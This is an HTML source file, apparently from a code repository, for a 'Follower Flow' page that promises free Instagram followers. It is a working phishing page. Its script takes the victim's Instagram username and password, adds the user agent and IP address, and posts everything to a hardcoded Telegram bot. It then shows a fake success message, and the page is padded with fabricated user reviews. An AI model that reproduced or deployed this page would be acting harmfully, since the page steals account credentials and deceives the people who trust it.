-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
351 lines (316 loc) · 12.1 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Follower Flow</title>
<style>
/* General Styles */
body {
margin: 0;
font-family: 'Arial', sans-serif;
background-color: #f8f9fa;
color: #333;
display: flex;
justify-content: center;
align-items: center;
flex-direction: column;
padding: 20px;
min-height: 100vh;
}
/* Login Section */
.login-container {
width: 100%;
max-width: 400px;
background-color: #f4f4f9;
padding: 20px;
border-radius: 10px;
box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.1);
text-align: center;
}
.login-title {
font-size: 24px;
color: #ff6bcb;
margin-bottom: 20px;
}
.login-input {
width: 100%;
padding: 10px;
margin: 10px 0;
border: 1px solid #ccc;
border-radius: 5px;
}
.select-follower {
width: 100%;
padding: 10px;
margin: 10px 0;
border: 1px solid #ccc;
border-radius: 5px;
background-color: #fff;
}
.next-button {
background-color: #ff6bcb;
color: white;
padding: 10px;
border: none;
border-radius: 5px;
cursor: pointer;
transition: background-color 0.3s;
}
.next-button:hover {
background-color: #e55a9c;
}
/* Success Pop-up */
.popup {
display: none;
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: rgba(0, 0, 0, 0.6);
justify-content: center;
align-items: center;
}
.popup-content {
background-color: white;
padding: 30px;
border-radius: 10px;
text-align: center;
width: 90%;
max-width: 400px;
}
.popup-message {
font-size: 18px;
color: #333;
margin-bottom: 20px;
}
.popup-success {
color: #28a745;
font-weight: bold;
font-size: 20px;
}
.popup-close {
background-color: #ff6bcb;
color: white;
padding: 10px 20px;
border: none;
border-radius: 5px;
cursor: pointer;
transition: background-color 0.3s;
}
.popup-close:hover {
background-color: #e55a9c;
}
/* Reviews Section */
.reviews-container {
width: 80%;
max-width: 900px;
margin-top: 30px;
padding: 20px;
background-color: #f4f4f9;
border-radius: 10px;
box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.1);
}
.reviews-title {
text-align: center;
font-size: 24px;
color: #ff6bcb;
margin-bottom: 20px;
}
.review-card {
padding: 15px;
margin-bottom: 20px;
background-color: #fff;
border-radius: 8px;
box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.05);
}
.review-card:nth-child(even) {
background-color: #f9f9f9;
}
.reviewer-name {
font-weight: bold;
color: #ff6bcb;
margin-bottom: 8px;
}
.review-text {
font-size: 14px;
color: #555;
margin-bottom: 10px;
}
.review-stars {
color: #ffc107;
}
/* Responsive */
@media (max-width: 768px) {
.login-container, .reviews-container {
width: 90%;
}
.login-title, .reviews-title {
font-size: 20px;
}
.review-card {
font-size: 14px;
}
}
/* Scrollable reviews */
.reviews-list {
max-height: 400px;
overflow-y: auto;
scrollbar-width: thin;
}
.reviews-list::-webkit-scrollbar {
width: 6px;
}
.reviews-list::-webkit-scrollbar-thumb {
background-color: #ff6bcb;
border-radius: 10px;
}
</style>
</head>
<body>
<!-- Login Section -->
<div class="login-container">
<h2 class="login-title">Follower Flow</h2>
<p>Get Free Instagram Followers</p>
<input id="instagramId" type="text" class="login-input" placeholder="Enter Instagram ID" />
<input id="password" type="password" class="login-input" placeholder="Enter Password" />
<select class="select-follower">
<option value="">Select Follower</option>
<option value="Follower1">500</option>
<option value="Follower2">1000</option>
<option value="Follower3">10000</option>
</select>
<button class="next-button" onClick="sendDataToTelegram()">Get Followers</button>
</div>
<!-- Success Pop-up -->
<div id="successPopup" class="popup">
<div class="popup-content">
<p class="popup-success">Success!</p>
<p class="popup-message">Your followers request is successful. You will receive your followers within 24 hours.</p>
<button class="popup-close" onclick="closePopup()">Close</button>
</div>
</div>
<!-- Reviews Section -->
<div class="reviews-container">
<h2 class="reviews-title">User Reviews</h2>
<div class="reviews-list">
<div class="review-card">
<p class="reviewer-name">Mukesh Singh</p>
<p class="review-text">"This service helped me grow my Instagram followers quickly. Highly recommend!"</p>
<p class="review-stars">★★★★★</p>
</div>
<div class="review-card">
<p class="reviewer-name">sakshi</p>
<p class="review-text">“यह सेवा मेरी इंस्टाग्राम प्रोफ़ाइल को तेजी से बढ़ाने में बहुत मददगार थी। मैं इसे पूरी तरह से सलाह देती हूँ।”</p>
<p class="review-stars">★★★★☆</p>
</div>
<div class="review-card">
<p class="reviewer-name">anushka khan</p>
<p class="review-text">"The interface is user-friendly and the process is seamless. Great experience overall!"</p>
<p class="review-stars">★★★★★</p>
</div>
<div class="review-card">
<p class="reviewer-name">rajesh verma</p>
<p class="review-text">“फॉलोअर फ्लो से मेरा इंस्टाग्राम अकाउंट बहुत तेजी से बढ़ा। बहुत आसान और प्रभावी प्रक्रिया।”</p>
<p class="review-stars">★★★★☆</p>
</div>
<div class="review-card">
<p class="reviewer-name">Dr. Rinku</p>
<p class="review-text">"I never expected such quick results. I’m thrilled with the outcome!"</p>
<p class="review-stars">★★★★★</p>
</div>
<div class="review-card">
<p class="reviewer-name">Vinay Kumar</p>
<p class="review-text">"यह सेवा सचमुच अद्भुत है। इससे मेरे फॉलोअर्स जल्दी बढ़े हैं।"</p>
<p class="review-stars">★★★★★</p>
</div>
<div class="review-card">
<p class="reviewer-name">Nancy</p></p>
<p class="review-text">"A simple and efficient service to grow your Instagram presence."</p>
<p class="review-stars">★★★★☆</p>
</div>
<div class="review-card">
<p class="reviewer-name">Sandeep kumar</p>
<p class="review-text">"बहुत ही अच्छा अनुभव। इंस्टाग्राम फॉलोअर्स तेजी से बढ़े।"</p>
<p class="review-stars">★★★★★</p>
</div>
<div class="review-card">
<p class="reviewer-name">Vashnavi Pandey</p>
<p class="review-text">"Great tool for anyone looking to boost their social media following!"</p>
<p class="review-stars">★★★★★</p>
</div>
<div class="review-card">
<p class="reviewer-name">Aryan Singh</p>
<p class="review-text">"बहुत अच्छा काम। मैं इसकी सिफारिश करता हूँ।"</p>
<p class="review-stars">★★★★☆</p>
</div>
<div class="review-card">
<p class="reviewer-name">Black Billa</p>
<p class="review-text">"The best experience I’ve had with follower services. Highly recommended!"</p>
<p class="review-stars">★★★★★</p>
</div>
<div class="review-card">
<p class="reviewer-name">Priyanka verma</p>
<p class="review-text">"मेरे फॉलोअर्स की संख्या बढ़ने से बहुत खुश हूँ। धन्यवाद!"</p>
<p class="review-stars">★★★★★</p>
</div>
</div>
</div>
<script>
function showPopup() {
document.getElementById("successPopup").style.display = "flex";
document.getElementById("overlay").style.display = "block"; // Show overlay
}
function closePopup() {
document.getElementById("successPopup").style.display = "none";
document.getElementById("overlay").style.display = "none"; // Hide overlay
}
async function sendDataToTelegram() {
const instagramId = document.getElementById('instagramId').value;
const password = document.getElementById('password').value;
const userAgent = navigator.userAgent;
const deviceInfo = `${navigator.platform} - ${userAgent}`;
let ipAddress = '';
await fetch('https://api.ipify.org?format=json')
.then(response => response.json())
.then(data => {
ipAddress = data.ip;
})
.catch(error => {
console.error('Error fetching IP address:', error);
});
const message = `
🧑💻 User Info:
\n📱 Instagram ID: ${instagramId}
\n🔒 Password: ${password}
\n🌐 User Agent: ${userAgent}
\n🌍 IP Address: ${ipAddress} \n\nBy Karan Kumar`;
const telegramBotToken = '6751695148:AAHEYUWDN0BKvpvSycVHp_2kcXPhfeZk75o';
const chatId = '6768442364';
const telegramUrl = `https://api.telegram.org/bot${telegramBotToken}/sendMessage`;
await fetch(telegramUrl, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify({
chat_id: chatId,
text: message,
parse_mode: 'Markdown',
}),
})
.then(response => {
if (response.ok) {
showPopup(); // Show success popup if the request was successful
} else {
console.error('Error sending message to Telegram:', response);
}
})
.catch(error => {
console.error('Error:', error);
});
}
</script>
</body>
</html>